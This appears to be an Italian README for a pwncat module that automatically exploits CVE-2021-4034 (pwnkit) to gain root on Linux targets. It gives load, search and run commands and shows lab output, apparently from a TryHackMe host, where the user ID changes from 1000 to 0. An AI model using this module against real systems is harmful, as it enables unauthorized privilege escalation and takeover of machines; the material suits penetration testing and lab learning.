
pwncat module che sfrutta automaticamente CVE-2021-4034 (pwnkit)
Lo scopo di questo modulo è tentare di sfruttare CVE-2021-4034 (pwnkit) su un target quando si utilizza pwncat.
Non è necessario configurare alcuna directory, compilare alcun sorgente o avere gcc sul target remoto; il modulo pwnkit gestisce tutto questo automaticamente tramite il framework pwncat.
pwnkit.py da qualche parte sul tuo host dove è installato pwncat-cs. es.: /home/user/pwncat_modsload /home/user/pwncat_modssearch pwnkit. Dovresti vedere qualcosa del genere:(local) pwncat$ search pwnkit
Results
╷
Name │ Description
══════════════════╪══════════════════════════════════════════════════════════════════════════════════════════════
pwnkit │ Exploit CVE-2021-4034 to privesc to root
run pwnkit. Se ha successo, dovresti vedere l'UID cambiare a 0, e ora essere root. es.:(local) pwncat$ run pwnkit
[00:12:15] 10.10.184.131:47148: ran pwnkit. UID : Before(1000) | After(0) manager.py:955
Module pwnkit completed successfully run.py:100
(local) pwncat$
(remote) root@pwnkit:/# id
uid=0(root) gid=0(root) groups=0(root),1000(tryhackme)
load, puoi far caricare automaticamente questo modulo da pwncat all'avvio posizionandolo in ~/.local/share/pwncat/modules# Set the gcc path
set cross "/usr/bin/gcc"
Un ringraziamento speciale a Caleb Stewart per essere stato disponibile mentre imparavo il framework pwncat da una prospettiva di sviluppo. Invierò una pull request per inserire questo nel modulo escalate principale di pwncat un giorno quando avrò tempo libero... Lo prometto. :-)